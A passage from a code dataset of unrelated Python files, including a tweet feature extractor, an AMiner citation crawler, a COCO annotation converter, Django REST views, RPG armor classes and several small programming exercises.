features. Returns None if no\n valid tweets found\n \"\"\"\n features = np.zeros((len(tweets), 12))\n nlp = spacy.load(\"en_core_web_sm\")\n vds = SentimentIntensityAnalyzer()\n row = 0\n ids = []\n for i in range(len(tweets)):\n\n # Use the original tweet object when this tweet is a retweet\n if 'retweeted_status' in tweets[i].keys():\n tweet = tweets[i]['retweeted_status']\n else:\n tweet = tweets[i]\n\n if tweet['id'] in ids:\n continue\n else:\n ids.append(tweet['id'])\n\n # Get full text\n full_text = tweet['text']\n\n # loads text into spacy model\n doc = nlp(full_text)\n\n # Col 0 - Total char length, Col 1 - Average sentence length, Col 2 - word count\n features[row, 0] = len(full_text)\n sentences = list(doc.sents)\n features[row, 1] = sum([len(i) for i in sentences]) / max(len(sentences), 1) # average tokens per sentence\n words = [token.text for token in doc if not token.is_punct]\n features[row, 2] = len(words)\n\n # Col 3 - Number Hashtags used, Col 4 - Number User Mentions, Col 5 - Number URL's\n features[row, 3] = len(tweet['entities']['hashtags'])\n features[row, 4] = len(tweet['entities']['user_mentions'])\n features[row, 5] = len(tweet['entities']['urls'])\n\n # Date dictionary conversion\n dates = {'mon': 1, 'tue': 2, 'wed': 3, 'thu': 4, 'fri': 5, 'sat': 6, 'sun': 7}\n # Isolate time and verify proper notation\n time = tweet['created_at'][11:16]\n if time[2] != ':':\n print(\"Time Notational Error\")\n sys.exit()\n time = int(time[0:2]) * 60 + int(time[3:]) # minutes in 'HH:MM' start at index 3, not 4\n\n # Col 6 - Day, Col 7 - Time\n features[row, 6] = dates[tweet['created_at'][0:3].lower()]\n features[row, 7] = time\n\n # Col 8 - Sentiment. 
In some cases, either VADER or TextBlob result in scores of 0 - I consider this an error\n vdsAnalysis = vds.polarity_scores(full_text)['compound']\n blobAnalysis = TextBlob(full_text).sentiment.polarity\n if vdsAnalysis == 0:\n features[row, 8] = blobAnalysis\n else:\n features[row, 8] = vdsAnalysis\n\n # Col 9 - Author's followers, Col 10 - Likes (favorites) of the Tweet, Col 11 - Retweets\n features[row, 9] = tweets[i]['user']['followers_count']\n features[row, 10] = tweet['favorite_count']\n features[row, 11] = tweet['retweet_count']\n row += 1\n if not features.any():\n return None\n return features[~np.all(features == 0, axis=1)]\n\n\ndef build_dataset(source):\n \"\"\"\n Given a directory, load every text file and utilize load_list as well as build_features to assemble a database\n @:param source - directory to load Tweet record files from\n @:return numpy array of all selected Tweet instances and associated features\n \"\"\"\n dataset = None\n # Iterate through all files in the directory\n for file in os.listdir(source):\n # Load the tweets in file and build features\n tweet_list = load_list(source + \"/\" + file)\n current_features = build_features(tweet_list)\n # Continue if no features found and add to dataset otherwise\n if current_features is None:\n continue\n if dataset is None:\n dataset = current_features\n else:\n dataset = np.vstack((dataset, current_features))\n return dataset\n\n\nif __name__ == '__main__':\n dataset = build_dataset(\"data/Crises\")\n corr = np.corrcoef(dataset)\n print(dataset.shape)\n\n\n\n","sub_path":"crisis_predictor.py","file_name":"crisis_predictor.py","file_ext":"py","file_size_in_byte":5764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"129798558","text":"scores = []\r\nsum = 0\r\nfor i in range(5):\r\n score = int(input(\"Enter a score: \"))\r\n scores.append(score)\r\n sum += score\r\navg = sum/5\r\nprint(\"Average = \",avg)\r\ncnt = 0\r\nfor i in scores:\r\n if i > avg:\r\n cnt+=1\r\nprint(\"Number of students above average = \",cnt)\r\n\r\n\r\n","sub_path":"연습문제 6-5.py","file_name":"연습문제 6-5.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"400285324","text":"\"\"\"\nhttps://www.aminer.cn/ requires login to view additional info.\n\nTrying to log in on aminer.cn seems to be a bit buggy.\n\nThey seem to have some (private?) 
APIs:\n* apiv2.aminer.cn/magic\n* api.aminer.cn/api\n\nThe network tab in web browsers displays a lot of interesting XHR.\n\"\"\"\nimport urllib.parse\nimport logging\nfrom dataclasses import dataclass\nfrom typing import Generator, List, Tuple, Optional\n\nfrom ...storage import Author, Publication\nfrom ..step import Step\nfrom ..crawler import Crawler\n\n_log = logging.getLogger(__name__)\n\n\nclass ArnetMiner:\n def __init__(self, session, base_url=\"https://apiv2.aminer.cn/magic\"):\n self._session = session\n self._headers = {\"Accept\": \"application/json\"}\n self._base_url = base_url\n\n async def search_person(self, query):\n return await self.query(\n {\n \"action\": \"person7.SearchPersonWithDSL\",\n \"parameters\": {\n \"offset\": 0,\n \"size\": 20,\n \"query\": query,\n \"aggregation\": [\"gender\", \"h_index\", \"nation\", \"lang\"],\n },\n \"schema\": {\n \"person\": [\n \"id\",\n \"name\",\n \"name_zh\",\n \"avatar\",\n \"tags\",\n \"is_follow\",\n \"num_view\",\n \"num_follow\",\n \"is_upvoted\",\n \"num_upvoted\",\n \"is_downvoted\",\n \"bind\",\n {\n \"profile\": [\n \"position\",\n \"position_zh\",\n \"affiliation\",\n \"affiliation_zh\",\n \"org\",\n ]\n },\n {\n \"indices\": [\n \"hindex\",\n \"gindex\",\n \"pubs\",\n \"citations\",\n \"newStar\",\n \"risingStar\",\n \"activity\",\n \"diversity\",\n \"sociability\",\n ]\n },\n ]\n },\n }\n )\n\n async def get_stats(self, author_id):\n return await self.query(\n {\"action\": \"person.GetPersonPubsStats\", \"parameters\": {\"ids\": [author_id]}}\n )\n\n async def search_publications(self, author_id, offset):\n return await self.query(\n {\n \"action\": \"person.GetPersonPubs\",\n \"parameters\": {\n \"offset\": offset,\n \"size\": 100,\n \"sorts\": [\"!year\"],\n \"ids\": [author_id],\n \"searchType\": \"all\",\n },\n \"schema\": {\n \"publication\": [\n \"id\",\n \"year\",\n \"title\",\n \"title_zh\",\n \"authors._id\",\n \"authors.name\",\n \"authors.name_zh\",\n \"num_citation\",\n \"venue.info.name\",\n \"venue.volume\",\n \"venue.info.name_zh\",\n \"venue.issue\",\n \"pages.start\",\n \"pages.end\",\n \"lang\",\n \"pdf\",\n \"doi\",\n \"urls\",\n \"versions\",\n ]\n },\n }\n )\n\n async def search_cited_by(self, paper_id, offset):\n return await self.query(\n {\n \"action\": \"publication.CitedByPid\",\n \"parameters\": {\"offset\": offset, \"size\": 100, \"ids\": [paper_id]},\n }\n )\n\n async def query(self, data):\n url = self._base_url\n # Probably uses and returns a list so many can be invoked at once\n async with self._session.post(url, json=[data], headers=self._headers) as resp:\n if resp.status == 200:\n return (await resp.json())[\"data\"][0]\n else:\n raise ValueError(\n f\"HTTP {resp.status} fetching {url}:\\n{await resp.text()}\"\n )\n\n\ndef author_id_from_url(url):\n url = urllib.parse.urlparse(url)\n assert url.netloc == \"www.aminer.cn\", f\"unexpected domain {url.netloc}\"\n parts = url.path.split(\"/\")\n assert parts[1] == \"profile\", f\"unexpected path {parts[1]}\"\n return parts[3]\n\n\ndef adapt_publications(data) -> Generator[Publication, None, None]:\n def maybe_int(value):\n # Sometimes we get \"ArticleNo.22\" in the page which is not a page number\n return int(value) if value and value.isdigit() else None\n\n # If it has 0 keyValues then the items key will be missing\n for pub in data.get(\"items\", ()):\n pub_id = pub[\"id\"]\n yield Publication(\n id=pub_id,\n name=pub[\"title\"],\n authors=[\n Author(\n id=author.get(\"id\"),\n full_name=author[\"name\"],\n extra={\"organization\": 
author.get(\"org\"),},\n )\n for author in pub[\"authors\"]\n ],\n year=pub[\"year\"] or None, # may be 0, we prefer None\n ref=f\"https://www.aminer.cn/pub/{pub_id}\",\n extra={\n \"cit-count\": pub[\"num_citation\"], # used later\n \"doi\": pub.get(\"doi\"),\n \"language\": pub.get(\"lang\") or None,\n \"first-page\": maybe_int(pub.get(\"pages\", {}).get(\"start\")),\n \"last-page\": maybe_int(pub.get(\"pages\", {}).get(\"end\")),\n \"urls\": pub.get(\"urls\"),\n \"issue\": pub.get(\"venue\", {}).get(\"issue\") or None,\n \"volume\": pub.get(\"venue\", {}).get(\"volume\") or None,\n \"publisher\": pub.get(\"venue\", {}).get(\"info\", {}).get(\"name\"),\n \"pdf\": pub.get(\"pdf\") or None,\n },\n )\n\n\nclass Stage:\n @dataclass\n class FetchPublications:\n INDEX = 0\n known_pub_ids: Optional[List[str]] = None\n offset: int = 0\n\n @dataclass\n class FetchCitations:\n INDEX = 1\n missing_pub_ids: List[str]\n cit_offset: int = 0\n\n\nclass CrawlArnetMiner(Crawler):\n Stage = Stage\n\n @classmethod\n def namespace(cls):\n return \"aminer\"\n\n @classmethod\n def fields(cls):\n return {\n \"url\": 'Navigate to <a href=\"https://www.aminer.cn/\">AMiner\\'s home</a> and search for '\n \"your profile. Click on it when you find it and copy the URL.\"\n }\n\n @classmethod\n def validate_field(self, key, value):\n assert key == \"url\", f\"invalid key {key}\"\n author_id_from_url(value) # will raise (fail validation) on bad value\n\n @classmethod\n async def _step(cls, values, stage, session) -> Step:\n user_author_id = author_id_from_url(values[\"url\"])\n miner = ArnetMiner(session)\n\n if isinstance(stage, Stage.FetchPublications):\n data = await miner.search_publications(user_author_id, stage.offset)\n\n pub_count = data[\"keyValues\"][\"total\"]\n self_publications = list(adapt_publications(data))\n known_pub_ids = (stage.known_pub_ids or []) + [\n # Don't bother saving those without citations to save on requests\n p.id\n for p in self_publications\n if p.extra[\"cit-count\"] != 0\n ]\n\n offset = stage.offset + len(self_publications)\n if offset >= pub_count or not self_publications:\n delay = 30 * 60\n stage = Stage.FetchCitations(missing_pub_ids=known_pub_ids)\n else:\n delay = 5 * 60\n stage = Stage.FetchPublications(\n known_pub_ids=known_pub_ids, offset=offset\n )\n\n return Step(delay=delay, stage=stage, self_publications=self_publications,)\n\n elif isinstance(stage, Stage.FetchCitations):\n if not stage.missing_pub_ids:\n _log.debug(\"checked all publications\")\n return Step()\n\n pub_id = stage.missing_pub_ids[0]\n data = await miner.search_cited_by(pub_id, stage.cit_offset)\n\n # The listed citations are less than the found count for some reason; however it's\n # unlikely that they are greater (so if we previously fetched 0 we don't bother\n # making additional network requests).\n cit_count = data[\"keyValues\"][\"total\"]\n\n citations = list(adapt_publications(data))\n cit_offset = stage.cit_offset + len(citations)\n\n if cit_offset >= cit_count or not citations:\n delay = 30 * 60\n stage = Stage.FetchCitations(missing_pub_ids=stage.missing_pub_ids[1:])\n else:\n delay = 5 * 60\n stage = Stage.FetchCitations(\n missing_pub_ids=stage.missing_pub_ids, cit_offset=cit_offset\n )\n\n return Step(delay=delay, stage=stage, citations={pub_id: citations},)\n","sub_path":"server/crawler/crawlers/aminer.py","file_name":"aminer.py","file_ext":"py","file_size_in_byte":9603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} 
+{"seq_id":"635775210","text":"## Another script to convert old annotation into json\n# Also handy because it acts as the format for coco json: \nimport sys, json\nimport bird0 as oldBird\nimport numpy as np\n\n#from maskrcnn_benchmark.data.datasets import bird0 as oldBird\n\nann_file = sys.argv[1]\nspec_dir = sys.argv[2]\n\nold_database = oldBird.BirdDataset(ann_file,spec_dir)\nn_images = old_database.n_images\n\nn_categories = 2\n\ndata = {\n \"info\":{},\n \"licenses\":[{}] * n_images,\n \"images\":[{}] * n_images,\n \"annotations\":[], #list of dicts\n \"categories\":[{}] * n_categories # list of dicts\n}\n\ndata[\"info\"] = {\n \"description\": \"Cowbird Song Annotations\",\n \"url\": None,\n \"version\":\"1.0\",\n \"year\":2019,\n \"contributor\":\"aperkes\",\n \"date_created\":\"2019/01/01\"\n}\n\ndata[\"categories\"] = [\n {\"supercategory\":\"background\",\"id\":1,\"name\":\"noise\"},\n {\"supercategory\":\"cowbird\",\"id\":2,\"name\":\"vocalization\"}\n]\n\nann_count = 0\nfor i in range(n_images):\n image, _, idx = old_database[i]\n labels = old_database.label_list[i]\n boxes = old_database.box_list[i]\n data[\"licenses\"][i] = {\n \"url\": None,\n \"id\": idx,\n \"name\": \"Property of Schmidt/Kostas\"\n }\n data[\"images\"][i] = {\n \"license\":i,\n \"file_name\":old_database.images[i],\n \"coco_url\":None,\n \"height\":image.height,\n \"width\":image.width,\n \"date_captured\":\"2019\",\n \"flickr_url\":None,\n \"id\":idx\n }\n\n n_annotations = len(labels)\n for a in range(n_annotations):\n [x1,y1,x2,y2] = boxes[a]\n width = x2 - x1\n height = y2 - y1\n ann = {\n \"segmentations\":[[x1,y1,x2,y2]],\n \"area\": width * height,\n \"iscrowd\":0,\n \"image_id\": idx,\n \"bbox\":[x1,y1,width,height],\n \"category_id\":labels[a] + 1,\n \"id\": ann_count\n }\n ann_count += 1\n data[\"annotations\"].append(ann)\n \nwith open('output.json', 'w') as outfile:\n json.dump(data,outfile)\n","sub_path":"maskrcnn_benchmark/data/datasets/bird/annotation_to_json.py","file_name":"annotation_to_json.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"523485512","text":"import respy as rp\nfrom estimagic import maximize\n\n# obtain model input\nparams, options, df = rp.get_example_model(\"kw_97_extended_respy\")\n\n# process model specification\nlog_like = rp.get_log_like_func(params, options, df)\nsimulate = rp.get_simulate_func(params, options)\n\n# perform calibration\nresults, params_rslt = maximize(log_like, params, \"nlopt_bobyqa\")\n\n# conduct analysis\ndf_rslt = simulate(params_rslt)\n","sub_path":"material/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"410609124","text":"def manhattan_distance(x, y):\n return abs(x) + abs(y)\n\n# Map which x/y values change by what value for a given direction.\ndeltas = {\n 'R': (1, 0),\n 'L': (-1, 0),\n 'U': (0, 1),\n 'D': (0, -1)\n}\n\n# Get the coordinate points for a given wire.\ndef find_points(wire):\n points = set()\n paths = wire.split(',')\n x, y, steps = 0, 0, 0\n number_of_steps = {}\n for path in paths:\n direction = path[:1]\n length = int(path[1:])\n deltaX, deltaY = deltas[direction]\n while length > 0:\n length -= 1\n x += deltaX\n y += deltaY\n points.add((x, y))\n steps += 1\n number_of_steps.setdefault((x, y), steps)\n return points, number_of_steps\n\n# Puzzle input.\nwith open('input') as puzzleInput:\n 
wires = [value for value in puzzleInput.read().splitlines()]\n\npoints_wire_1, number_of_steps_wire1 = find_points(wires[0])\npoints_wire_2, number_of_steps_wire2 = find_points(wires[1])\n\n# We only care about where both wire 1 and wire 2 cross paths.\nintersections = points_wire_1 & points_wire_2\n\n# Figure out the closest intersection.\ndistances = [manhattan_distance(x, y) for x, y in intersections]\n\n# Part 1 answer.\nprint(min(distances))\n\n# The combined steps the wires must take to reach an intersection.\nsteps = [number_of_steps_wire1[(x, y)] + number_of_steps_wire2[(x, y)] for x, y in intersections]\n\n# Part 2 answer\nprint(min(steps))\n","sub_path":"03/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"618883875","text":"import random\n\narr = [None] * 100\ntmp = [None] * 99\n\nfor i in range(1, 100):\n arr[i] = i\ntmp += arr\narr[0] = random.randint(1, 99)\nrandom.shuffle(arr)\nprint(arr)\n\nfor i in arr:\n d = tmp[i-1]\n if d == None:\n tmp[i-1] = 1\n else:\n print(\"Duplicate Num: \", i)\n","sub_path":"week2/hw1-2.py","file_name":"hw1-2.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"204132325","text":"from .Armor import LegArmor\r\n\r\nclass BronzePants(LegArmor):\r\n def __init__(self, name=\"Bronze Pants\", value=10, weight=4, strBuff=2, agiBuff=0, intBuff=0, defense=3, hp=0, ap=0, hpR=0, apR=0, tier=1):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 0])\r\n self.setWeight(-1, 1)\r\n\r\n\r\nclass IronPants(LegArmor):\r\n def __init__(self, name=\"Iron Pants\", value=20, weight=6, strBuff=4, agiBuff=0, intBuff=0, defense=4, hp=0, ap=0, hpR=0, apR=0, tier=2):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([1, 0, 0])\r\n self.setWeight(-2.1, 1.1)\r\n\r\n\r\nclass SteelPants(LegArmor):\r\n def __init__(self, name=\"Steel Pants\", value=30, weight=6, strBuff=5, agiBuff=0, intBuff=0, defense=5, hp=0, ap=0, hpR=0, apR=0, tier=3):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([2, 0, 0])\r\n self.setWeight(-2.5, 2.5)\r\n\r\n\r\nclass PlatinumPants(LegArmor):\r\n def __init__(self, name=\"Platinum Pants\", value=40, weight=7, strBuff=7, agiBuff=0, intBuff=0, defense=6, hp=0, ap=0, hpR=0, apR=0, tier=4):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([2, 0, 0])\r\n self.setWeight(-1.9, 1.2)\r\n\r\n\r\nclass AdamantinePants(LegArmor):\r\n def __init__(self, name=\"Adamantine Pants\", value=50, weight=10, strBuff=10, agiBuff=2, intBuff=2, defense=9, hp=2, ap=2, hpR=1, apR=0, tier=5):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([4, 1, 0])\r\n self.setWeight(-2, 2)\r\n\r\n\r\nclass VibraniumPants(LegArmor):\r\n def __init__(self, name=\"Vibranium Pants\", value=50, weight=11, strBuff=15, agiBuff=3, intBuff=3, defense=10, hp=2, ap=3, hpR=2, apR=2, tier=6):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([9, 1, 0])\r\n self.setWeight(-3, 3)\r\n\r\n#-------------------------------\r\n\r\nclass LightLeatherPants(LegArmor):\r\n 
def __init__(self, name=\"Light-Leather Pants\", value=10, weight=2, strBuff=0, agiBuff=2, intBuff=0, defense=1, hp=0, ap=1, hpR=0, apR=0, tier=1):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 0])\r\n self.setWeight(-0.5, 0.2)\r\n\r\n\r\nclass HeavyLeatherPants(LegArmor):\r\n def __init__(self, name=\"Heavy-Leather Pants\", value=20, weight=4, strBuff=1, agiBuff=3, intBuff=0, defense=2, hp=0, ap=1, hpR=0, apR=0, tier=2):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 1, 0])\r\n self.setWeight(-0.6, 0.6)\r\n\r\n\r\nclass StuddedLeatherPants(LegArmor):\r\n def __init__(self, name=\"Studded Leather Pants\", value=30, weight=6, strBuff=2, agiBuff=4, intBuff=0, defense=3, hp=0, ap=2, hpR=0, apR=0, tier=3):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 1, 0])\r\n self.setWeight(-0.5, 0.3)\r\n\r\n\r\nclass WolfFurPants(LegArmor):\r\n def __init__(self, name=\"Wolf Fur Pants\", value=40, weight=5, strBuff=0, agiBuff=5, intBuff=0, defense=4, hp=0, ap=3, hpR=0, apR=0, tier=4):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 2, 0])\r\n self.setWeight(-0.8, 0.8)\r\n\r\n\r\nclass SnakeSkinPants(LegArmor):\r\n def __init__(self, name=\"Snake Skin Pants\", value=50, weight=5, strBuff=1, agiBuff=6, intBuff=0, defense=5, hp=0, ap=4, hpR=0, apR=2, tier=5):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 3, 0])\r\n self.setWeight(-1.5, 1.5)\r\n\r\n\r\nclass CloakingPants(LegArmor):\r\n def __init__(self, name=\"Cloaking Pants\", value=60, weight=4, strBuff=0, agiBuff=10, intBuff=0, defense=6, hp=0, ap=5, hpR=1, apR=4, tier=6):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 7, 0])\r\n self.setWeight(-1, 1.2)\r\n\r\n#-------------------------------\r\n\r\nclass BeginnerPants(LegArmor):\r\n def __init__(self, name=\"Beginner Pants\", value=10, weight=3, strBuff=0, agiBuff=0, intBuff=1, defense=1, hp=0, ap=2, hpR=0, apR=1, tier=1):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 0])\r\n self.setWeight(-0.5, 0.5)\r\n\r\n\r\nclass NovicePants(LegArmor):\r\n def __init__(self, name=\"Novice Pants\", value=20, weight=3, strBuff=0, agiBuff=0, intBuff=3, defense=2, hp=0, ap=3, hpR=0, apR=2, tier=2):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 1])\r\n self.setWeight(-0.7, 0.8)\r\n\r\n\r\nclass ApprenticePants(LegArmor):\r\n def __init__(self, name=\"Apprentice Pants\", value=30, weight=3, strBuff=0, agiBuff=0, intBuff=6, defense=3, hp=0, ap=5, hpR=0, apR=3, tier=3):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 2])\r\n self.setWeight(-0.5, 0.5)\r\n\r\nclass WizardPants(LegArmor):\r\n def __init__(self, name=\"Wizard Pants\", value=40, weight=4, strBuff=0, agiBuff=0, intBuff=9, defense=5, hp=0, ap=7, hpR=0, apR=4, tier=4):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 6])\r\n self.setWeight(-0.7, 0.7)\r\n\r\n\r\nclass MasterPants(LegArmor):\r\n 
def __init__(self, name=\"Master Pants\", value=50, weight=3, strBuff=2, agiBuff=2, intBuff=15, defense=7, hp=0, ap=10, hpR=0, apR=5, tier=5):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 9])\r\n self.setWeight(-0.7, 0.8)\r\n","sub_path":"Content/Items/Armor/LegArmor.py","file_name":"LegArmor.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"287375728","text":"def main():\n f = open(\"input.txt\",\"r\")\n line = f.readline()\n print(line)\n\n change = list()\n result = \"\"\n for i in range(len(line)):\n change.append(ord(line[i])+1)\n \n\n for i in range(len(change)-1):\n result = result + chr(change[i])\n \n print(result)\n f.close()\n\nmain()\n","sub_path":"practice1/cypher_3_2018110047.py","file_name":"cypher_3_2018110047.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"291610593","text":"from django.shortcuts import render\n\nfrom django.http.response import JsonResponse\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework import status\n\nfrom aperetteAPI.models import Aperette, Categorie, Ingredient\nfrom aperetteAPI.serializers import AperetteSerializer, CategorieSerializer, IngredientSerializer\n\nfrom rest_framework.decorators import api_view\n\nfrom django.conf.urls import url\nfrom rest_framework_swagger.views import get_swagger_view\n\nschema_view = get_swagger_view(title='Pastebin API')\n\nurlpatterns = [\n url(r'^$', schema_view)\n]\n\n@api_view(['GET', 'POST'])\ndef aperettes_list(request):\n if request.method == 'GET':\n aperettes = Aperette.objects.all()\n\n nom = request.GET.get('nom', None)\n if nom is not None:\n aperettes = aperettes.filter(nom__icontains=nom)\n\n aperettes_serializer = AperetteSerializer(aperettes, many=True)\n return JsonResponse(aperettes_serializer.data, safe=False)\n\n elif request.method == 'POST':\n aperette_data = JSONParser().parse(request)\n aperette_serializer = AperetteSerializer(data=aperette_data)\n if aperette_serializer.is_valid():\n aperette_serializer.save()\n return JsonResponse(aperette_serializer.data, status=status.HTTP_201_CREATED)\n return JsonResponse(aperette_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET', 'PUT'])\ndef aperette_detail(request, pk):\n try:\n aperette = Aperette.objects.get(pk=pk)\n except Aperette.DoesNotExist:\n return JsonResponse({'message': 'Cet aperette n\\'existe pas'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n aperette_serializer = AperetteSerializer(aperette)\n return JsonResponse(aperette_serializer.data)\n\n elif request.method == 'PUT':\n aperette_data = JSONParser().parse(request)\n aperette_serializer = AperetteSerializer(aperette, data=aperette_data)\n if aperette_serializer.is_valid():\n aperette_serializer.save()\n return JsonResponse(aperette_serializer.data)\n return JsonResponse(aperette_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET', 'POST'])\ndef categories_list(request):\n if request.method == 'GET':\n categories = Categorie.objects.all()\n\n nom = request.GET.get('nom', None)\n if nom is not None:\n categories = categories.filter(nom__icontains=nom)\n\n categories_serializer = CategorieSerializer(categories, many=True)\n return JsonResponse(categories_serializer.data, safe=False)\n\n elif request.method == 
'POST':\n categorie_data = JSONParser().parse(request)\n categorie_serializer = CategorieSerializer(data=categorie_data)\n if categorie_serializer.is_valid():\n categorie_serializer.save()\n return JsonResponse(categorie_serializer.data, status=status.HTTP_201_CREATED)\n return JsonResponse(categorie_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'PUT'])\ndef categorie_detail(request, pk):\n try:\n categorie = Categorie.objects.get(pk=pk)\n except Categorie.DoesNotExist:\n return JsonResponse({'message': 'This category does not exist'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n categorie_serializer = CategorieSerializer(categorie)\n return JsonResponse(categorie_serializer.data)\n\n elif request.method == 'PUT':\n categorie_data = JSONParser().parse(request)\n categorie_serializer = CategorieSerializer(categorie, data=categorie_data)\n if categorie_serializer.is_valid():\n categorie_serializer.save()\n return JsonResponse(categorie_serializer.data)\n return JsonResponse(categorie_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n@api_view(['GET', 'POST'])\ndef ingredients_list(request):\n if request.method == 'GET':\n ingredients = Ingredient.objects.all()\n\n nom = request.GET.get('nom', None)\n if nom is not None:\n ingredients = ingredients.filter(nom__icontains=nom)\n\n ingredients_serializer = IngredientSerializer(ingredients, many=True)\n return JsonResponse(ingredients_serializer.data, safe=False)\n\n elif request.method == 'POST':\n ingredient_data = JSONParser().parse(request)\n ingredient_serializer = IngredientSerializer(data=ingredient_data)\n if ingredient_serializer.is_valid():\n ingredient_serializer.save()\n return JsonResponse(ingredient_serializer.data, status=status.HTTP_201_CREATED)\n return JsonResponse(ingredient_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET', 'PUT'])\ndef ingredient_detail(request, pk):\n try:\n ingredient = Ingredient.objects.get(pk=pk)\n except Ingredient.DoesNotExist:\n return JsonResponse({'message': 'This ingredient does not exist'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n ingredient_serializer = IngredientSerializer(ingredient)\n return JsonResponse(ingredient_serializer.data)\n\n elif request.method == 'PUT':\n ingredient_data = JSONParser().parse(request)\n ingredient_serializer = IngredientSerializer(ingredient, data=ingredient_data)\n if ingredient_serializer.is_valid():\n ingredient_serializer.save()\n return JsonResponse(ingredient_serializer.data)\n return JsonResponse(ingredient_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"aperetteAPI/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"21542699","text":"#!/usr/bin/env python3\n\n#General Packages\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n#Packages to make life easier\nfrom tqdm import tqdm, trange\nimport os, yaml, glob, pickle\nfrom PIL import Image\n\ndef transparent_cmap(cmap, N=255):\n \"Copy colormap and set alpha values\"\n\n mycmap = cmap\n mycmap._init()\n mycmap._lut[:,-1] = np.linspace(0, 0.8, N+4)\n return mycmap\n\ndef make_image(path_to_map,path_to_data):\n c = (1500,1700,2500,2500)\n #Use base cmap to create transparent\n mycmap = transparent_cmap(plt.cm.gray)\n\n\n # Import image and get x and y extents\n I = Image.open(path_to_map+'map.pgm')\n p = 
np.asarray(I).astype('float')\n w, h = I.size\n y, x = np.mgrid[0:h, 0:w]\n\n #Plot image and overlay colormap\n fig, ax = plt.subplots(1, 1)\n #ax.imshow(I.crop(c), cmap='gray')\n heatmap = make_heatmap(path_to_map,path_to_data)\n cb = ax.imshow(heatmap[c[1]:c[3],c[0]:c[2]],cmap=cm.spectral)\n\n plt.colorbar(cb)\n plt.show()\n\ndef make_heatmap(path_to_map,path_to_data):\n step = 1\n map_params = yaml.load(open(path_to_map + 'map.yaml', 'rb'))\n I = Image.open(path_to_map+'map.pgm')\n w,h = I.size\n files = glob.glob(path_to_data + '*.p')\n # print(files)\n im = np.zeros((int(w/step),int(h/step)), dtype=int)\n origin = map_params['origin']\n resolution = map_params['resolution']*step\n\n\n for file in tqdm(files):\n dataset = pickle.load(open(file,'rb'))\n for data in dataset:\n if data[1] > 1000:\n continue\n for point in data[2]:\n x = point.position.x - origin[0]\n y = point.position.y - origin[1]\n x_coord = int(x / resolution)\n y_coord = int(h/step) - int(y / resolution) - 1\n im[y_coord,x_coord] = im[y_coord,x_coord] + 1\n # max = im.max()\n # 